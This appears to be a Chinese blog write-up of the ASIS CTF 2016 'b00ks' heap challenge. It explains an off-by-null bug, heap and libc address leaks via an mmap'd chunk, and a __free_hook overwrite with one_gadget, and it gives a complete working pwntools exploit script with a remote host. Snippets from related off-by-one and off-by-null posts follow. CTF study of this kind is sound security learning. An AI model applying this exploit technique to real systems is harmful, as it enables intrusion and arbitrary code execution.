off-by-null-b00ks

ASISCTF2016_b00ks挑战解析
最新推荐文章于 2024-11-09 21:29:56 发布
原创 最新推荐文章于 2024-11-09 21:29:56 发布 · 434 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文详细解析了ASISCTF2016_b00ks挑战赛中的堆溢出漏洞利用过程。通过利用off-by-null漏洞和bss段特性,实现了对堆和libc地址的泄露,并最终通过__free_hook和one_gadget技巧获得了shell。此文章适合对堆溢出攻击有兴趣的安全研究人员。

题目: asisctf2016_b00ks

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HNoRgUrU-1642340360848)(off-by-null.assets/image-20220116195353489.png)]

除了canary全开,因为是堆题,所以基本可以认为保护措施全开

分析

主函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-flBDG3BV-1642340360849)(off-by-null.assets/image-20220116195613703.png)]

程序封装的read函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8b36tYAM-1642340360850)(off-by-null.assets/image-20220116195723248.png)]

add函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x9IphPf3-1642340360851)(off-by-null.assets/image-20220116195752315.png)]
在这里插入图片描述

由add函数可得出以下结构示意图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Dfj8zsQx-1642340360852)(off-by-null.assets/image-20220116200808101.png)]

dele函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-djoyK1X4-1642340360852)(off-by-null.assets/image-20220116195857929.png)]

edit函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-r5dFWDGN-1642340360853)(off-by-null.assets/image-20220116195917126.png)]

show函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7eENpDQ5-1642340360853)(off-by-null.assets/image-20220116195945893.png)]

init_name函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pn5MBWAC-1642340360854)(off-by-null.assets/image-20220116200003501.png)]
重命名的bss段
在这里插入图片描述

思路

  1. 因为有off-by-null漏洞且bss段中 name到ptr_array的距离刚好0x20大小 name:0x202040 ptr
  2. 填充’P’*0x20大小时会覆盖到ptr_array处最低字节为\x00
  3. 但是ptr[0]是下一步才写入的值,所以并不会改变该值的最低位为\x00
sla('Enter author name: ','P'*0x20)

#创建一个堆块 , 它的指针保存在0x202060

add(0x1d0,'AAAA',0x20,'BBBB') #这里chunk大小为构造下面只能覆盖\x00的要求,从而使它指向fake chunk地址

#此时打印时会连带输出0x202060的值,也就是堆的地址

  1 show()  
  2 ru('P'*0x20)
  3 chunk1 = uu64(rc(6))
  4 success('chunk1 addr',chunk1)

bss如图:

  1. 我们知道unsotbin + uaf 泄露libc是通过得到main_arean出的值从而获取libc的固定偏移
  2. 那么mmap()分配也是类似的原理,它分配的chunk在.tls段前,通过固定偏移也可泄露libc
add(0x21000,'CCCC',0x21000,'DDDD') #这里申请一个大于topchunk大小的chunk则会由mmap()分配
#且它不会放到堆空间处

泄露libc

  1 chunk2 = chunk1 + 0x30  #申请的第二个chunk地址
  2 fake = p64(1) + p64(0) + p64(chunk2+0x10)+ p64(0x20)  
'''p64(1) 是该chunk的索引 
   p64(0)作为占位使用
   p64(chunk2+0x10)是指向chunk2 的description_ptr
   p64(0x20) chunk2 的description_ptr的size
   fake chunk的结构这里结构必须完整,不然后面对fake chunk进行修改时,会导致程序崩溃'''
  3 edit(1,fake)
  4 name('P'*0x20) #重新覆盖ptr_array[0]的最低字节为\x00  通过前面的size构造这里就指向>
  5 show() #而p64(chunk2+8)指向的是mmap()分配处的地址 ,这样就形成了双级指针,从而打印出地址
  6 ru("Name: ")
  7 libc_base = uu64(rc(6)) - (0x7f7edfb43010-0x7f7edf59e000) #计算偏移差
  8 success('libc',libc_base)

那么我们来看看现在的堆结构:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xNmYLwnM-1642340360855)(off-by-null.assets/image-20220116191551493.png)]

那么现在修改chunk1的内容就等同于 修改chunk2的description_ptr指针

那么修改chunk2的内容就等同于 修改上面chunk2的description_ptr指针下的内容

这就形成了一个自定义指针关系,该程序保护措施限制了got表 , 那么可以使用 __free_hook + one_gadge

  1 free_hook = libc_base + libc.symbols['__free_hook']
  2 edit(1,p64(free_hook))
  3 edit(2,p64(libc_base + one[1]))
  4 dele(1) #getshell

完整exp:

# -*-coding:utf-8 -*
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')


binary = "./b00ks"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + b'\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def z(s='b main'):
 gdb.attach(p,s)

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

def pa(s='暂停!'):
  log.success('当前执行步骤 -> '+str(s))
  pause()
one = [0x45206,0x4525a,0xcc673,0xcc748,0xefa00,0xf0897,0xf5e40,0xef9f4] #2.23
#one = [0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf03b0,0xf1247,0xf67f0]

def add(a,b,c,d):
    sla('> ','1')
    sla('Enter book name size:',str(a))
    sla('Enter book name (Max 32 chars):',b)
    sla('Enter book description size:',str(c))
    sla('Enter book description:',d)
def dele(a):
    sla('> ','2')
    sla('Enter the book id you want to delete:',str(a))
def show():
    sla('> ','4')
def edit(a,b):
    sla('> ','3')
    sla('Enter the book id you want to edit:',str(a))
    sla('Enter new book description:',b)
def name(a):
    sla('> ','5')
    sla('name: ',a)


#------------leak heap_addr----------------
sla('Enter author name: ','P'*0x20)
#因为有off-by-null漏洞且bss段中 name到ptr_array的距离刚好0x20大小 name:0x202040 ptr_array:0x202060
#填充'P'*0x20大小时会覆盖到ptr_array处最低字节为\x00
#但是ptr[0]是下一步才写入的值,所以并不会改变该值的最低位为\x00
add(0x1d0,'AAAA',0x20,'BBBB') #创建一个堆块 , 它的指针保存在0x202060
show()  #此时打印时会连带输出0x202060的值,也就是堆的地址
ru('P'*0x20)
chunk1 = uu64(rc(6))
success('chunk1 addr',chunk1)
#------------leak libc----------------
#我们知道unsotbin + uaf 泄露libc是通过得到main_arean出的值从而获取libc的固定偏移
#那么mmap()分配也是类似的原理,它分配的chunk在.tls段前,通过固定偏移也可泄露libc
add(0x21000,'CCCC',0x21000,'DDDD')
#这里申请一个大于topchunk大小的chunk则会由mmap()分配
#且它不会放到堆空间处
chunk2 = chunk1 + 0x30  #申请的第二个chunk地址
fake = p64(1) + p64(0) + p64(chunk2+0x10)+ p64(0x20)  #p64(1) 是该chunk的索引
edit(1,fake)
name('P'*0x20) #重新覆盖ptr_array[0]的最低字节为\x00  通过前面的size构造这里就指向了p64(chunk2+8)
show() #而p64(chunk2+8)指向的是mmap()分配处的地址 ,这样就形成了双级指针,从而打印出了mmap()分配的指针地址
ru("Description: ")
libc_base = uu64(rc(6)) - (0x7f7edfb43010-0x7f7edf59e000)
success('libc',libc_base)
#------------attack into __free_hook----------------
#该程序保护措施限制了got表 , 那么可以使用 __free_hook + one_gadger进行getshell
free_hook = libc_base + libc.symbols['__free_hook']
edit(1,p64(free_hook))
edit(2,p64(libc_base + one[1]))
dele(1) #getshell
#------------end----------------
it()
学习打卡2:off-by-null
一点涵的博客
09-08 970
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
堆溢出-off-by-one-b00ks
zhuo1358的博客
07-26 471
堆溢出_off_by_one,经典题目b00ks
off by null 小结
qq_43409582的博客
11-20 3797
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1509
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
高版本libc_off_by_null(一看就懂)
qq_41683953的博客
03-16 2514
在libc2.29之后新增保护,区别与普通的off_by_null会判断pre_size和要合并的chunk_size是否相同普通的off_by_null只需要修改pre_inuse和pre_size即可完成重叠但是现在需要修改前一个的chunk_size这个显然不可能,那就只能自己伪造chunk。
【技术分享】实例剖析堆off_by_null漏洞
Innocence_0的博客
07-23 412
此时我们若在此处便写入shellcode,待后续我们劫持free_hook时,就可以无需写入libc中的system地址,而是直接填写shellcode的地址即可。(2)编辑刚刚所申请的0x30的chunk,将main_arena+88改为free_hook的地址,注意此处需要爆破半个字节。(5)控制tcache链上的fd指针,把main_arena+88的地址修改为free_hook的地址后,将其申请出来。chunk的大小是0x90,我就在此处申请一个0x30的chunk,以便对这片内存进行操作。
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1683
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1319
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
《CTF竞赛权威指南》|Off-By-One
qq_50883855的博客
11-16 2088
堆中的Off-By-One,CTF Wiki
pwn学习笔记(11)--off_by_one
最新发布
qq_66013948的博客
11-09 1024
​ 多次输入几个a之后,发现了最后输出的时候输出了17个a,我的目的仅仅只是需要16个a,结果输出了17个a,像这种,在写入字符串的时候多写入了一个字节的情况,就是off by one。prev_sizeprev_sizeprev_sizeprev_size​ 最新版本代码中,已加入针对 2 中后一种方法的 check ,但是在 2.28 及之前版本并没有该 check。
Linux下堆漏洞利用(off-by-one)
nibiru_holmes的博客
03-14 9079
一个字节溢出被称为off-by-one,曾经的一段时间里,off-by-one被认为是不可以利用的,但是后来研究发现在堆上哪怕只有一个字节的溢出也会导致任意代码的执行。同时堆的off-by-one利用也出现在国内外的各类CTF竞赛中,但是在网络上还不能找到一篇系统的介绍堆off-by-one利用的教程。在这篇文章中我列出了5种常见的堆上的off-by-one攻击方式,并且给出了测试DEMO,测试的
以[GKCTF 2020]domo为例来看off-by-null
A13837377363的博客
04-18 833
首先,由于是off-by-null,所以你被off的chunk的大小必须是0x100,0x200这样,因为一字节会直接覆盖十六进制的低2位,你如果是0x80,会直接变成0x00,会出现错误。这是还要注意一点,合并之前一定要先释放掉要合并的最底下的chunk,让它的fd和bk域有相应的地址,因为合并的时候会进行unlink,如果bk和fd区域是乱七八糟的东西肯定会报错。这是off-by-null之后,变成了0x100,当这个chunk被free的时候就会认为前面有个0x130的空闲chunk,会进行合并。
常回家看看之off_by_null(堆篇)
susu_xiaosu的博客
07-06 746
💧上次介绍了堆里面的off_by_one,那么这个off_by_null和它有神马区别呢,哎,别看名字挺像,它俩无论是在栈里面还是堆里面都有很大区别的。📌off_by_one,这个我们知道可以通过溢出控制到下一个字节,体现在堆里面就是,可以控制到下一个chunk的size位,我们知道根据堆的排布,当申请0x18,0x28,0x38,等这样末尾是8时(32位的是4),那么下一个chunk的prev_size就是我们的输入数据的空间,那么off_by_one就可以修改下一个chunk的size位实现一些堆漏
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3602
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
Unlink学习笔记(off-by-one null byte漏洞利用)
TaiJi1985的专栏
08-27 2928
看了很多malloc unlink 的案例,仍然是云里雾里, 找了一个案例,反复调了几十遍才弄明白其中原理。 off-by-one 漏洞 以及漏洞利用原理 off-by-one漏洞就是malloc 本来分配了0xf8的内存,结果可以写0xf9字节的数据,多写了一个,影响了下一个内存块的头部信息, 进而造成了被利用的可能。 unlink是双链表中删除一个节点的操作。 当前是p 前一个...
Linux (x86) Exploit 开发系列教程之十一 Off-By-One 漏洞(基于堆)
热门推荐
龙哥盟
05-03 4万+
Off-By-One 漏洞(基于堆) 译者:飞龙 原文:Off-By-One Vulnerability (Heap Based) 预备条件: Off-By-One 漏洞(基于栈) 理解 glibc malloc VM 配置:Fedora 20(x86) 什么是 Off-By-One 漏洞? 在这篇文章中提到过,将源字符串复制到目标缓冲区可能造成 Off-By-One 漏洞,当源字
【八芒星计划】 OFF BY NULL
carol2358的博客
08-31 1096
八芒星计划是我为了加深自己对于pwn各种题型的理解发起的,我会将平时遇到的题型相似的题目放在同一篇文章里,方便自己和他人查阅,同时也可能会录制相关的视频,来加深自己的映像,并且把知识点更细致地讲述给大家。 这一篇全部记录off by null 文章目录2019-BALSN-CTF-plaintext 2019-BALSN-CTF-plaintext 【2.29的off by null,借助large bin的会留下指向自己的指针的特性,来伪造fake chunk,达成off by null】 本题进行
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2660
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 361
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值